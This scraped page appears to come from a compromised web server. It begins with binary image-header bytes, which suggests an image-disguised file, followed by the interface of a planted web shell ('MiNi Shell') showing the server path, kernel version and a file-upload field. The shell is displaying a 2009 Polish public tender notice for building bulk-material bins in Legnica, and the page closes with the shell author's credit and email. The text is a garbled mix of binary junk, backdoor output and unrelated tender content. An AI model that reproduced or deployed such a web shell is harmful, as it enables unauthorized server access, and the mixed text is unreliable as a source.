JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090430/128728-N-2009.html

<p class="kh_header"><b>Legnica: Budowa zasieków na materiały sypkie dla LPGK</b><br>
<b>Numer ogłoszenia: 128728 - 2009; data zamieszczenia: 30.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Legnickie Przedsiębiorstwo Gospodarki Komunalnej Sp. z o.o. , ul. Nowodworska 60, 59-220 Legnica, woj. dolnośląskie, tel. 076 8566350 w. 103, faks 076 7233763.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lpgk.legnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa zasieków na materiały sypkie dla LPGK.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Roboty pomiarowe przy powierzchniowych robotach ziemnych- niwelacja terenu pod obiekty przemysłowe- 0.046 ha
2.	Roboty ziemne wykonywane koparkami podsiębiernymi o poj. łyżki 0.25m3 w gr. Kat. III z transp. urobku na odl. do 1 km sam. samowyład.-343,004 m3
3.	Zasypywanie wykopów ze skarpami z przerzutem na odl. do 3m z zagęszczeniem; kat. gr. I-III-10.395 m3
4.	Wywóz ziemi samochodami samowyładowczymi- za każdy nast. 1 km  krotność=9- 332,609 m3
5.	Deskowanie tradycyjne ław fundamentowych betonowych- 126,935 m2
6.	Betonowanie ław fundamentowych niezbrojonych w deskowaniu tradycyjnym- 86,915 m3
7.	Podsypka żwirowa 2-16 mm- 145.870 m3
8.	Podbudowy betonowe gr. 10 cm- 137.048 m2
9.	Izolacja z folii polietylenowej pozioma podposadzkowa- 381.200 m2
10.	Elementy ścian oporowych firmy Westerwelle typu T-KANT o masie do 2 t, nr 1- 92.000 elem.
11.	Elementy ścian oporowych firmy Westerwelle typu ZIRKANT o masie do 1,5 t, nr 2-18.000 elem.
12.	Ręczne wykonanie ślepych otworów w betonie objętości do 0.1 dm3- 206.000 szt.
13.	Zbrojenie konstrukcji monolitycznych prętami stalowymi okrągłymi żebrowanymi o śr. Do 10 mm-3.881 t.
14.	Betonowanie płyt wewnątrz boksów, zbrojnych w deskowaniu tradycyjnym- 56.640 m3.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.26.22.10-6, 45.32.00.00-6, 45.22.35.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 10.000,00PLN<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawcy, którzy ubiegają się o zamówienie publiczne muszą spełniać niżej wymienione warunki : 
1) Nie podlegać wykluczeniu na podstawie art. 24 oraz spełniać warunki określone w art. 22 ust. 1 pkt. 1 - 3 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (tekst jednolity Dz. U. z 2006 r. nr 164 poz. 1163 ze zmianami w dniu 04 września 2008 r. Dz. U. nr 171 poz. 1058).
Ocena spełnienia warunku odbywać się będzie wg dodatku nr 2 do niniejszej SIWZ.
W przypadku składania oferty przez podmioty występujące wspólnie ww. warunek podmioty te muszą  spełniać osobno.
2) Prowadzić działalność w zakresie wykonywania prac będących przedmiotem zamówienia 
Ocena spełnienia warunku odbywać się będzie wg załączonego dokumentu określonego  w pkt. I.6.3) niniejszej SIWZ.
W przypadku składania oferty przez podmioty występujące wspólnie ww. warunek podmioty te muszą  spełniać osobno.
3) Dysponują osobami zdolnymi do wykonania zamówienia, tj.:
a) osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia (jeżeli ustawy nakładają obowiązek posiadania takich uprawnień):
Osoby, które będą wykonywać zamówienie posiadają wymagane uprawnienia budowlane tj.:
1.	Wykonawca dysponuje co najmniej jedną osobą (bądź kilkoma osobami które łącznie spełniają poniższe warunki) posiadającą uprawnienia budowlane do:
kierowania robotami budowlanymi bez ograniczeń 
2.	Osoba/-y o której mowa powyżej muszą spełniać poniższe warunki:
- jest/są wpisana/e do PIIB 
Ocena spełnienia warunku odbywać się będzie wg załączonego dokumentu określonego w pkt. I.6.12) niniejszej SIWZ.
W przypadku składania oferty przez podmioty występujące wspólnie ww. warunek podmioty te mogą spełnić łącznie.

4)	Posiadają niezbędną wiedzę i doświadczenie w realizacji podobnych zamówień tzn. jako Wykonawca wykonali w okresie ostatnich 5 lat przed wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie co najmniej 1 zamówienie odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty zostały wykonane należycie. Przez wartość zamówienia odpowiadającą wartości robót stanowiących  przedmiot zamówienia należy rozumieć wartość oferowaną przez Wykonawcę.
Ocena spełnienia warunku odbywać się będzie wg załączonego dokumentu określonego w pkt. I.6.13) niniejszej SIWZ.
W przypadku składania oferty przez podmioty występujące wspólnie ww. warunek podmioty te mogą spełnić łącznie.

5)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj,:
-są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności (w szczególności, chodzi o działalność, która jest zgodna z przedmiotem zamówienia), przy czym ubezpieczenie musi spełniać następujące warunki minimalne:
- okres ubezpieczenia: najpóźniej od terminu składania ofert przez co najmniej 210 dni,
- suma ubezpieczenia- co najmniej 100 000,00 PLN.
Ocena spełnienia warunku odbywać się będzie wg w/w/ dokumentów.
W przypadku składania oferty przez podmioty występujące wspólnie ww. warunek podmioty te mogą spełnić łącznie.

6)	 Wykonają siłami własnym nie mniej niż 70% zakresu rzeczowego robót.
Ocena spełnienia warunku odbywać się będzie wg załączonego dokumentu określonego   w pkt. I.6.10) niniejszej SIWZ.
W przypadku składania oferty przez podmioty występujące wspólnie ww. warunek podmioty te muszą  spełniać osobno

7)	Dysponują potencjałem technicznym, czyli mają do dyspozycji niezbędne do wykonania zamówienia narzędzia i urządzenia, którymi dysponuje lub będzie dysponował Wykonawca (przez dzierżawę, wynajem, umowę kupna, leasing lub inny sposób) przewidziane do realizacji zamówienia.
Ocena spełniania warunku odbywać się będzie wg załączonego dokumentu określonego w pkt. I.6.11) niniejszej SIWZ.
W przypadku składania oferty przez podmioty występujące wspólnie ww. warunek podmioty te mogą spełnić łącznie.
8)	 wpłacić wadium w wysokości 10.000,00 zł 
Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie dokumentów załączonych do oferty według formuły  SPEŁNIA - NIE SPEŁNIA. Wykonawca musi wykazać spełnienie każdego z warunków.  Niespełnienie któregokolwiek warunku spowoduje wykluczenie wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na ofertę składają się następujące dokumenty : 
1)	wypełniony FORMULARZ OFERTOWY według dodatku 1 do SIWZ,
2) oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 pkt. 1 - 3 i nie podleganiu wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych   (tekst jednolity Dz. U. z 2006 r. nr 164 poz. 1163 ze zmianami w dniu 04 września 2008 r. Dz. U. nr 171 poz. 1058)., według dodatku nr 2 do SIWZ,
3) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
W przypadku składania oferty przez podmioty występujące wspólnie, właściwe dokumenty muszą być złożone przez każdy podmiot.
4)  aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
W przypadku składania oferty przez podmioty występujące wspólnie, informacja musi być złożona przez każdy podmiot.
5)  aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy - Prawo zamówień publicznych, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
W przypadku składania oferty przez podmioty występujące wspólnie, informacja musi być złożona przez każdy podmiot.
6) aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, opłat, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie  w całości wykonania decyzji właściwego Urzędu Skarbowego - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
W przypadku składania oferty przez podmioty występujące wspólnie zaświadczenie musi być złożone przez każdy podmiot.
7) aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie  w całości wykonania decyzji właściwego oddziału ZUS lub KRUS - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
W przypadku składania oferty przez podmioty występujące wspólnie zaświadczenie musi być złożone przez każdy podmiot.
8) oświadczenie o dokonaniu wizji lokalnej nieruchomości  i terenu, sporządzone według wzoru, stanowiącego załącznik nr 3 do SIWZ
9) kosztorys ofertowy wraz z zestawieniem materiałów sporządzony przez Wykonawcę zgodnie z wymaganiami SIWZ na podstawie załączonego przedmiaru robót
10) wskazanie części zamówienia, której wykonanie powierzy podwykonawcom wykaz części zamówienia, których wykonanie Wykonawca zamierza powierzyć podwykonawcom, wg załącznika  nr 4.Łączna wartość zamówienia, którą Wykonawca zamierza powierzyć podwykonawcom nie może być większa niż 30% wartości całego zamówienia.
11) Wykaz sprzętu i urządzeń- wg  załącznika nr 5 do siwz oraz pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w załączniku nr 5 Wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował.
12) Wykaz osób, które będą uczestniczyć w wykonaniu  zamówienia, wraz z informacjami na temat ich  kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności- wg załącznika nr 6, wraz z dokumentami stwierdzającymi, że osoba która będzie wykonywać obowiązki kierownika budowy, posiada wymagane uprawnienia, jest wpisana na listę członków PIIB oraz jest aktualnie ubezpieczona od odpowiedzialności cywilnej za szkody, które mogą wyniknąć w związku z wykonywaniem wyżej wymienionej funkcji.
Do załącznika dołączyć: kserokopie uprawnień budowlanych, potwierdzenie wpisu na listę członków PIIB oraz załączyć informacje na temat kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych czynności oraz pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonywania zamówienia, jeżeli w załączniku nr 6 wykonawca wskazał osoby, którymi będzie dysponował.
13) wykaz wykonanych robót budowlanych, w okresie minimum 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzonej działalności jest krótszy- co najmniej 1 zamówienie w tym zakresie odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania- wg załącznika nr 7. Do załącznika należy dołączyć dokumenty od poprzednich zamawiających potwierdzające, że roboty te zostały wykonane należycie.
14) gwarancja jakości Wykonawcy- wg załącznika nr 8.
15) polisa, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
16) wypełniona i zaparafowana umowa- według dodatku nr 9 do SIWZ.
17) warunki zmian w umowie- wg załącznika nr 10.
18) dowód wpłaty wadium. 	
Opis dokonywania oceny spełniania warunków udziału w postępowaniu : zamawiający oceni spełnianie warunków w zależności od złożonych dokumentów na zasadzie SPEŁNIA - NIE SPEŁNIA..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.lpgk.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba zamawiającego, Legnica, ul. Nowodworska 60, pokój nr 2 -parter.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.05.2009 godzina 09:00, miejsce: siedziba zamawiającego, Legnica, ul. Nowodworska 60, sekretariat-I piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com